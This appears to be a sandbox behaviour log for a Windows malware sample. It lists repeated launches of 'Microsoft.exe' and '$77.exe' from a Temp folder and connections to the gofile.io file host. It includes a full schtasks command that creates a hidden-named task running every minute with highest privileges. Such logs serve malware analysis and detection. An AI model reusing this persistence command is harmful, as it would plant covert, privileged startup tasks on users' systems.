"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,7667697316579257103,11095032943597636429,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4716 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,7667697316579257103,11095032943597636429,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2476 /prefetch:1

C:\Windows\System32\schtasks.exe

"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "$77" /tr "C:\ProgramData\$77"

C:\Users\Admin\AppData\Local\Temp\Microsoft.exe

"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"

C:\Users\Admin\AppData\Local\Temp\$77.exe

"C:\Users\Admin\AppData\Local\Temp\$77.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,7667697316579257103,11095032943597636429,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3996 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,7667697316579257103,11095032943597636429,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5864 /prefetch:1

C:\Users\Admin\AppData\Local\Temp\Microsoft.exe

"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"

C:\Users\Admin\AppData\Local\Temp\$77.exe

"C:\Users\Admin\AppData\Local\Temp\$77.exe"

C:\Users\Admin\AppData\Local\Temp\Microsoft.exe

"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"

C:\Users\Admin\AppData\Local\Temp\$77.exe

"C:\Users\Admin\AppData\Local\Temp\$77.exe"

C:\Users\Admin\AppData\Local\Temp\Microsoft.exe

"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"

C:\Users\Admin\AppData\Local\Temp\$77.exe

"C:\Users\Admin\AppData\Local\Temp\$77.exe"

C:\Users\Admin\AppData\Local\Temp\Microsoft.exe

"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"

C:\Users\Admin\AppData\Local\Temp\$77.exe

"C:\Users\Admin\AppData\Local\Temp\$77.exe"

C:\Users\Admin\AppData\Local\Temp\Microsoft.exe

"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"

C:\Users\Admin\AppData\Local\Temp\$77.exe

"C:\Users\Admin\AppData\Local\Temp\$77.exe"

C:\Users\Admin\AppData\Local\Temp\Microsoft.exe

"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"

C:\Users\Admin\AppData\Local\Temp\$77.exe

"C:\Users\Admin\AppData\Local\Temp\$77.exe"

C:\Users\Admin\AppData\Local\Temp\Microsoft.exe

"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"

C:\Users\Admin\AppData\Local\Temp\$77.exe

"C:\Users\Admin\AppData\Local\Temp\$77.exe"

C:\Users\Admin\AppData\Local\Temp\Microsoft.exe

"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"

C:\Users\Admin\AppData\Local\Temp\$77.exe

"C:\Users\Admin\AppData\Local\Temp\$77.exe"

C:\ProgramData\$77

C:\ProgramData\$77

C:\Users\Admin\AppData\Local\Temp\Microsoft.exe

"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"

C:\Users\Admin\AppData\Local\Temp\$77.exe

"C:\Users\Admin\AppData\Local\Temp\$77.exe"

C:\Users\Admin\AppData\Local\Temp\Microsoft.exe

"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"

C:\Users\Admin\AppData\Local\Temp\$77.exe

"C:\Users\Admin\AppData\Local\Temp\$77.exe"

C:\Users\Admin\AppData\Local\Temp\Microsoft.exe

"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"

C:\Users\Admin\AppData\Local\Temp\$77.exe

"C:\Users\Admin\AppData\Local\Temp\$77.exe"

C:\Users\Admin\AppData\Local\Temp\Microsoft.exe

"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"

C:\Users\Admin\AppData\Local\Temp\$77.exe

"C:\Users\Admin\AppData\Local\Temp\$77.exe"

C:\Users\Admin\AppData\Local\Temp\Microsoft.exe

"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"

C:\Users\Admin\AppData\Local\Temp\$77.exe

"C:\Users\Admin\AppData\Local\Temp\$77.exe"

C:\Users\Admin\AppData\Local\Temp\Microsoft.exe

"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"

C:\Users\Admin\AppData\Local\Temp\$77.exe

"C:\Users\Admin\AppData\Local\Temp\$77.exe"

C:\Users\Admin\AppData\Local\Temp\Microsoft.exe

"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"

C:\Users\Admin\AppData\Local\Temp\$77.exe

"C:\Users\Admin\AppData\Local\Temp\$77.exe"

C:\Users\Admin\AppData\Local\Temp\Microsoft.exe

"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"

C:\Users\Admin\AppData\Local\Temp\$77.exe

"C:\Users\Admin\AppData\Local\Temp\$77.exe"

C:\Users\Admin\AppData\Local\Temp\Microsoft.exe

"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"

C:\Users\Admin\AppData\Local\Temp\$77.exe

"C:\Users\Admin\AppData\Local\Temp\$77.exe"

C:\Users\Admin\AppData\Local\Temp\Microsoft.exe

"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"

C:\Users\Admin\AppData\Local\Temp\$77.exe

"C:\Users\Admin\AppData\Local\Temp\$77.exe"

C:\Users\Admin\AppData\Local\Temp\Microsoft.exe

"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"

C:\Users\Admin\AppData\Local\Temp\$77.exe

"C:\Users\Admin\AppData\Local\Temp\$77.exe"

C:\Users\Admin\AppData\Local\Temp\Microsoft.exe

"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"

C:\Users\Admin\AppData\Local\Temp\$77.exe

"C:\Users\Admin\AppData\Local\Temp\$77.exe"

C:\Users\Admin\AppData\Local\Temp\Microsoft.exe

"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"

C:\Users\Admin\AppData\Local\Temp\$77.exe

"C:\Users\Admin\AppData\Local\Temp\$77.exe"

C:\Users\Admin\AppData\Local\Temp\Microsoft.exe

"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"

C:\Users\Admin\AppData\Local\Temp\$77.exe

"C:\Users\Admin\AppData\Local\Temp\$77.exe"

C:\Users\Admin\AppData\Local\Temp\Microsoft.exe

"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"

C:\Users\Admin\AppData\Local\Temp\$77.exe

"C:\Users\Admin\AppData\Local\Temp\$77.exe"

C:\Users\Admin\AppData\Local\Temp\Microsoft.exe

"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"

C:\Users\Admin\AppData\Local\Temp\$77.exe

"C:\Users\Admin\AppData\Local\Temp\$77.exe"

C:\Users\Admin\AppData\Local\Temp\Microsoft.exe

"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"

C:\Users\Admin\AppData\Local\Temp\$77.exe

"C:\Users\Admin\AppData\Local\Temp\$77.exe"

C:\Users\Admin\AppData\Local\Temp\Microsoft.exe

"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"

C:\Users\Admin\AppData\Local\Temp\$77.exe

"C:\Users\Admin\AppData\Local\Temp\$77.exe"

C:\Users\Admin\AppData\Local\Temp\Microsoft.exe

"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"

C:\Users\Admin\AppData\Local\Temp\$77.exe

"C:\Users\Admin\AppData\Local\Temp\$77.exe"

C:\Users\Admin\AppData\Local\Temp\Microsoft.exe

"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"

C:\Users\Admin\AppData\Local\Temp\$77.exe

"C:\Users\Admin\AppData\Local\Temp\$77.exe"

C:\Users\Admin\AppData\Local\Temp\Microsoft.exe

"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"

C:\Users\Admin\AppData\Local\Temp\$77.exe

"C:\Users\Admin\AppData\Local\Temp\$77.exe"

C:\Users\Admin\AppData\Local\Temp\Microsoft.exe

"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"

C:\Users\Admin\AppData\Local\Temp\$77.exe

"C:\Users\Admin\AppData\Local\Temp\$77.exe"

C:\Users\Admin\AppData\Local\Temp\Microsoft.exe

"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"

C:\Users\Admin\AppData\Local\Temp\$77.exe

"C:\Users\Admin\AppData\Local\Temp\$77.exe"

C:\Users\Admin\AppData\Local\Temp\Microsoft.exe

"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"

C:\Users\Admin\AppData\Local\Temp\$77.exe

"C:\Users\Admin\AppData\Local\Temp\$77.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2084,7667697316579257103,11095032943597636429,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=5004 /prefetch:2

C:\Users\Admin\AppData\Local\Temp\Microsoft.exe

"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"

C:\Users\Admin\AppData\Local\Temp\$77.exe

"C:\Users\Admin\AppData\Local\Temp\$77.exe"

C:\Users\Admin\AppData\Local\Temp\Microsoft.exe

"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"

C:\Users\Admin\AppData\Local\Temp\$77.exe

"C:\Users\Admin\AppData\Local\Temp\$77.exe"

C:\Users\Admin\AppData\Local\Temp\Microsoft.exe

"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"

C:\Users\Admin\AppData\Local\Temp\$77.exe

"C:\Users\Admin\AppData\Local\Temp\$77.exe"

C:\ProgramData\$77

C:\ProgramData\$77

C:\Users\Admin\AppData\Local\Temp\Microsoft.exe

"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"

C:\Users\Admin\AppData\Local\Temp\$77.exe

"C:\Users\Admin\AppData\Local\Temp\$77.exe"

C:\Users\Admin\AppData\Local\Temp\Microsoft.exe

"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"

C:\Users\Admin\AppData\Local\Temp\$77.exe

"C:\Users\Admin\AppData\Local\Temp\$77.exe"

C:\Users\Admin\AppData\Local\Temp\Microsoft.exe

"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"

C:\Users\Admin\AppData\Local\Temp\$77.exe

"C:\Users\Admin\AppData\Local\Temp\$77.exe"

C:\Users\Admin\AppData\Local\Temp\Microsoft.exe

"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"

C:\Users\Admin\AppData\Local\Temp\$77.exe

"C:\Users\Admin\AppData\Local\Temp\$77.exe"

C:\Users\Admin\AppData\Local\Temp\Microsoft.exe

"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"

C:\Users\Admin\AppData\Local\Temp\$77.exe

"C:\Users\Admin\AppData\Local\Temp\$77.exe"

C:\Users\Admin\AppData\Local\Temp\Microsoft.exe

"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"

C:\Users\Admin\AppData\Local\Temp\$77.exe

"C:\Users\Admin\AppData\Local\Temp\$77.exe"

C:\Users\Admin\AppData\Local\Temp\Microsoft.exe

"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"

C:\Users\Admin\AppData\Local\Temp\$77.exe

"C:\Users\Admin\AppData\Local\Temp\$77.exe"

C:\Users\Admin\AppData\Local\Temp\Microsoft.exe

"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"

C:\Users\Admin\AppData\Local\Temp\$77.exe

"C:\Users\Admin\AppData\Local\Temp\$77.exe"

C:\Users\Admin\AppData\Local\Temp\Microsoft.exe

"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"

C:\Users\Admin\AppData\Local\Temp\$77.exe

"C:\Users\Admin\AppData\Local\Temp\$77.exe"

C:\Users\Admin\AppData\Local\Temp\Microsoft.exe

"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"

C:\Users\Admin\AppData\Local\Temp\$77.exe

"C:\Users\Admin\AppData\Local\Temp\$77.exe"

C:\Users\Admin\AppData\Local\Temp\Microsoft.exe

"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"

C:\Users\Admin\AppData\Local\Temp\$77.exe

"C:\Users\Admin\AppData\Local\Temp\$77.exe"

C:\Users\Admin\AppData\Local\Temp\Microsoft.exe

"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"

C:\Users\Admin\AppData\Local\Temp\$77.exe

"C:\Users\Admin\AppData\Local\Temp\$77.exe"

C:\Users\Admin\AppData\Local\Temp\Microsoft.exe

"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"

C:\Users\Admin\AppData\Local\Temp\$77.exe

"C:\Users\Admin\AppData\Local\Temp\$77.exe"

C:\Users\Admin\AppData\Local\Temp\Microsoft.exe

"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"

C:\Users\Admin\AppData\Local\Temp\$77.exe

"C:\Users\Admin\AppData\Local\Temp\$77.exe"

C:\Users\Admin\AppData\Local\Temp\Microsoft.exe

"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"

C:\Users\Admin\AppData\Local\Temp\$77.exe

"C:\Users\Admin\AppData\Local\Temp\$77.exe"

C:\Users\Admin\AppData\Local\Temp\Microsoft.exe

"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"

C:\Users\Admin\AppData\Local\Temp\$77.exe

"C:\Users\Admin\AppData\Local\Temp\$77.exe"

C:\Users\Admin\AppData\Local\Temp\Microsoft.exe

"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"

C:\Users\Admin\AppData\Local\Temp\$77.exe

"C:\Users\Admin\AppData\Local\Temp\$77.exe"

C:\Users\Admin\AppData\Local\Temp\Microsoft.exe

"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"

C:\Users\Admin\AppData\Local\Temp\$77.exe

"C:\Users\Admin\AppData\Local\Temp\$77.exe"

C:\Users\Admin\AppData\Local\Temp\Microsoft.exe

"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"

C:\Users\Admin\AppData\Local\Temp\$77.exe

"C:\Users\Admin\AppData\Local\Temp\$77.exe"

C:\Users\Admin\AppData\Local\Temp\Microsoft.exe

"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"

C:\Users\Admin\AppData\Local\Temp\$77.exe

"C:\Users\Admin\AppData\Local\Temp\$77.exe"

C:\Users\Admin\AppData\Local\Temp\Microsoft.exe

"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"

C:\Users\Admin\AppData\Local\Temp\$77.exe

"C:\Users\Admin\AppData\Local\Temp\$77.exe"

C:\Users\Admin\AppData\Local\Temp\Microsoft.exe

"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"

C:\Users\Admin\AppData\Local\Temp\$77.exe

"C:\Users\Admin\AppData\Local\Temp\$77.exe"

C:\Users\Admin\AppData\Local\Temp\Microsoft.exe

"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"

C:\Users\Admin\AppData\Local\Temp\$77.exe

"C:\Users\Admin\AppData\Local\Temp\$77.exe"

C:\Users\Admin\AppData\Local\Temp\Microsoft.exe

"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"

C:\Users\Admin\AppData\Local\Temp\$77.exe

"C:\Users\Admin\AppData\Local\Temp\$77.exe"

C:\Users\Admin\AppData\Local\Temp\Microsoft.exe

"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"

C:\Users\Admin\AppData\Local\Temp\$77.exe

"C:\Users\Admin\AppData\Local\Temp\$77.exe"

C:\Users\Admin\AppData\Local\Temp\Microsoft.exe

"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"

C:\Users\Admin\AppData\Local\Temp\$77.exe

"C:\Users\Admin\AppData\Local\Temp\$77.exe"

C:\Users\Admin\AppData\Local\Temp\Microsoft.exe

"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"

C:\Users\Admin\AppData\Local\Temp\$77.exe

"C:\Users\Admin\AppData\Local\Temp\$77.exe"

C:\ProgramData\$77

C:\ProgramData\$77

C:\Users\Admin\AppData\Local\Temp\Microsoft.exe

"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"

C:\Users\Admin\AppData\Local\Temp\$77.exe

"C:\Users\Admin\AppData\Local\Temp\$77.exe"

C:\Users\Admin\AppData\Local\Temp\Microsoft.exe

"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"

C:\Users\Admin\AppData\Local\Temp\$77.exe

"C:\Users\Admin\AppData\Local\Temp\$77.exe"

C:\Users\Admin\AppData\Local\Temp\Microsoft.exe

"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"

C:\Users\Admin\AppData\Local\Temp\$77.exe

"C:\Users\Admin\AppData\Local\Temp\$77.exe"

C:\Users\Admin\AppData\Local\Temp\Microsoft.exe

"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"

C:\Users\Admin\AppData\Local\Temp\$77.exe

"C:\Users\Admin\AppData\Local\Temp\$77.exe"

C:\Users\Admin\AppData\Local\Temp\Microsoft.exe

"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"

C:\Users\Admin\AppData\Local\Temp\$77.exe

"C:\Users\Admin\AppData\Local\Temp\$77.exe"

C:\Users\Admin\AppData\Local\Temp\Microsoft.exe

"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"

C:\Users\Admin\AppData\Local\Temp\$77.exe

"C:\Users\Admin\AppData\Local\Temp\$77.exe"

C:\Users\Admin\AppData\Local\Temp\Microsoft.exe

"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"

C:\Users\Admin\AppData\Local\Temp\$77.exe

"C:\Users\Admin\AppData\Local\Temp\$77.exe"

C:\Users\Admin\AppData\Local\Temp\Microsoft.exe

"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"

C:\Users\Admin\AppData\Local\Temp\$77.exe

"C:\Users\Admin\AppData\Local\Temp\$77.exe"

C:\Users\Admin\AppData\Local\Temp\Microsoft.exe

"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"

C:\Users\Admin\AppData\Local\Temp\$77.exe

"C:\Users\Admin\AppData\Local\Temp\$77.exe"

C:\Users\Admin\AppData\Local\Temp\Microsoft.exe

"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"

C:\Users\Admin\AppData\Local\Temp\$77.exe

"C:\Users\Admin\AppData\Local\Temp\$77.exe"

C:\Users\Admin\AppData\Local\Temp\Microsoft.exe

"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"

C:\Users\Admin\AppData\Local\Temp\$77.exe

"C:\Users\Admin\AppData\Local\Temp\$77.exe"

C:\Users\Admin\AppData\Local\Temp\Microsoft.exe

"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"

C:\Users\Admin\AppData\Local\Temp\$77.exe

"C:\Users\Admin\AppData\Local\Temp\$77.exe"

C:\Users\Admin\AppData\Local\Temp\Microsoft.exe

"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"

C:\Users\Admin\AppData\Local\Temp\$77.exe

"C:\Users\Admin\AppData\Local\Temp\$77.exe"

C:\Users\Admin\AppData\Local\Temp\Microsoft.exe

"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"

C:\Users\Admin\AppData\Local\Temp\$77.exe

"C:\Users\Admin\AppData\Local\Temp\$77.exe"

C:\Users\Admin\AppData\Local\Temp\Microsoft.exe

"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"

C:\Users\Admin\AppData\Local\Temp\$77.exe

"C:\Users\Admin\AppData\Local\Temp\$77.exe"

C:\Users\Admin\AppData\Local\Temp\Microsoft.exe

"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"

C:\Users\Admin\AppData\Local\Temp\$77.exe

"C:\Users\Admin\AppData\Local\Temp\$77.exe"

C:\Users\Admin\AppData\Local\Temp\Microsoft.exe

"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"

C:\Users\Admin\AppData\Local\Temp\$77.exe

"C:\Users\Admin\AppData\Local\Temp\$77.exe"

C:\Users\Admin\AppData\Local\Temp\Microsoft.exe

"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"

C:\Users\Admin\AppData\Local\Temp\$77.exe

"C:\Users\Admin\AppData\Local\Temp\$77.exe"

C:\Users\Admin\AppData\Local\Temp\Microsoft.exe

"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"

C:\Users\Admin\AppData\Local\Temp\$77.exe

"C:\Users\Admin\AppData\Local\Temp\$77.exe"

C:\Users\Admin\AppData\Local\Temp\Microsoft.exe

"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"

C:\Users\Admin\AppData\Local\Temp\$77.exe

"C:\Users\Admin\AppData\Local\Temp\$77.exe"

C:\Users\Admin\AppData\Local\Temp\Microsoft.exe

"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"

C:\Users\Admin\AppData\Local\Temp\$77.exe

"C:\Users\Admin\AppData\Local\Temp\$77.exe"

C:\Users\Admin\AppData\Local\Temp\Microsoft.exe

"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"

C:\Users\Admin\AppData\Local\Temp\$77.exe

"C:\Users\Admin\AppData\Local\Temp\$77.exe"

C:\Users\Admin\AppData\Local\Temp\Microsoft.exe

"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"

C:\Users\Admin\AppData\Local\Temp\$77.exe

"C:\Users\Admin\AppData\Local\Temp\$77.exe"

C:\Users\Admin\AppData\Local\Temp\Microsoft.exe

"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"

C:\Users\Admin\AppData\Local\Temp\$77.exe

"C:\Users\Admin\AppData\Local\Temp\$77.exe"

C:\Users\Admin\AppData\Local\Temp\Microsoft.exe

"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"

C:\Users\Admin\AppData\Local\Temp\$77.exe

"C:\Users\Admin\AppData\Local\Temp\$77.exe"

C:\Users\Admin\AppData\Local\Temp\Microsoft.exe

"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"

C:\Users\Admin\AppData\Local\Temp\$77.exe

"C:\Users\Admin\AppData\Local\Temp\$77.exe"

C:\Users\Admin\AppData\Local\Temp\Microsoft.exe

"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"

C:\Users\Admin\AppData\Local\Temp\$77.exe

"C:\Users\Admin\AppData\Local\Temp\$77.exe"

C:\ProgramData\$77

C:\ProgramData\$77

C:\Users\Admin\AppData\Local\Temp\Microsoft.exe

"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"

C:\Users\Admin\AppData\Local\Temp\$77.exe

"C:\Users\Admin\AppData\Local\Temp\$77.exe"

C:\Users\Admin\AppData\Local\Temp\Microsoft.exe

"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"

C:\Users\Admin\AppData\Local\Temp\$77.exe

"C:\Users\Admin\AppData\Local\Temp\$77.exe"

C:\Users\Admin\AppData\Local\Temp\Microsoft.exe

"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"

C:\Users\Admin\AppData\Local\Temp\$77.exe

"C:\Users\Admin\AppData\Local\Temp\$77.exe"

C:\Users\Admin\AppData\Local\Temp\Microsoft.exe

"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"

C:\Users\Admin\AppData\Local\Temp\$77.exe

"C:\Users\Admin\AppData\Local\Temp\$77.exe"

C:\Users\Admin\AppData\Local\Temp\Microsoft.exe

"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"

C:\Users\Admin\AppData\Local\Temp\$77.exe

"C:\Users\Admin\AppData\Local\Temp\$77.exe"

C:\Users\Admin\AppData\Local\Temp\Microsoft.exe

"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"

C:\Users\Admin\AppData\Local\Temp\$77.exe

"C:\Users\Admin\AppData\Local\Temp\$77.exe"

C:\Users\Admin\AppData\Local\Temp\Microsoft.exe

"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"

C:\Users\Admin\AppData\Local\Temp\$77.exe

"C:\Users\Admin\AppData\Local\Temp\$77.exe"

C:\Users\Admin\AppData\Local\Temp\Microsoft.exe

"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"

C:\Users\Admin\AppData\Local\Temp\$77.exe

"C:\Users\Admin\AppData\Local\Temp\$77.exe"

C:\Users\Admin\AppData\Local\Temp\Microsoft.exe

"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"

C:\Users\Admin\AppData\Local\Temp\$77.exe

"C:\Users\Admin\AppData\Local\Temp\$77.exe"

C:\Users\Admin\AppData\Local\Temp\Microsoft.exe

"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"

C:\Users\Admin\AppData\Local\Temp\$77.exe

"C:\Users\Admin\AppData\Local\Temp\$77.exe"

C:\Users\Admin\AppData\Local\Temp\Microsoft.exe

"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"

C:\Users\Admin\AppData\Local\Temp\$77.exe

"C:\Users\Admin\AppData\Local\Temp\$77.exe"

C:\Users\Admin\AppData\Local\Temp\Microsoft.exe

"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"

C:\Users\Admin\AppData\Local\Temp\$77.exe

"C:\Users\Admin\AppData\Local\Temp\$77.exe"

C:\Users\Admin\AppData\Local\Temp\Microsoft.exe

"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"

C:\Users\Admin\AppData\Local\Temp\$77.exe

"C:\Users\Admin\AppData\Local\Temp\$77.exe"

C:\Users\Admin\AppData\Local\Temp\Microsoft.exe

"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"

C:\Users\Admin\AppData\Local\Temp\$77.exe

"C:\Users\Admin\AppData\Local\Temp\$77.exe"

C:\Users\Admin\AppData\Local\Temp\Microsoft.exe

"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"

C:\Users\Admin\AppData\Local\Temp\$77.exe

"C:\Users\Admin\AppData\Local\Temp\$77.exe"

C:\Users\Admin\AppData\Local\Temp\Microsoft.exe

"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"

C:\Users\Admin\AppData\Local\Temp\$77.exe

"C:\Users\Admin\AppData\Local\Temp\$77.exe"

C:\Users\Admin\AppData\Local\Temp\Microsoft.exe

"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"

C:\Users\Admin\AppData\Local\Temp\$77.exe

"C:\Users\Admin\AppData\Local\Temp\$77.exe"

C:\Users\Admin\AppData\Local\Temp\Microsoft.exe

"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"

C:\Users\Admin\AppData\Local\Temp\$77.exe

"C:\Users\Admin\AppData\Local\Temp\$77.exe"

C:\Users\Admin\AppData\Local\Temp\Microsoft.exe

"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"

C:\Users\Admin\AppData\Local\Temp\$77.exe

"C:\Users\Admin\AppData\Local\Temp\$77.exe"

C:\Users\Admin\AppData\Local\Temp\Microsoft.exe

"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"

C:\Users\Admin\AppData\Local\Temp\$77.exe

"C:\Users\Admin\AppData\Local\Temp\$77.exe"

C:\Users\Admin\AppData\Local\Temp\Microsoft.exe

"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"

C:\Users\Admin\AppData\Local\Temp\$77.exe

"C:\Users\Admin\AppData\Local\Temp\$77.exe"

C:\Users\Admin\AppData\Local\Temp\Microsoft.exe

"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"

C:\Users\Admin\AppData\Local\Temp\$77.exe

"C:\Users\Admin\AppData\Local\Temp\$77.exe"

C:\Users\Admin\AppData\Local\Temp\Microsoft.exe

"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"

C:\Users\Admin\AppData\Local\Temp\$77.exe

"C:\Users\Admin\AppData\Local\Temp\$77.exe"

C:\Users\Admin\AppData\Local\Temp\Microsoft.exe

"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"

C:\Users\Admin\AppData\Local\Temp\$77.exe

"C:\Users\Admin\AppData\Local\Temp\$77.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 gofile.io udp
FR 51.178.66.33:443 gofile.io tcp
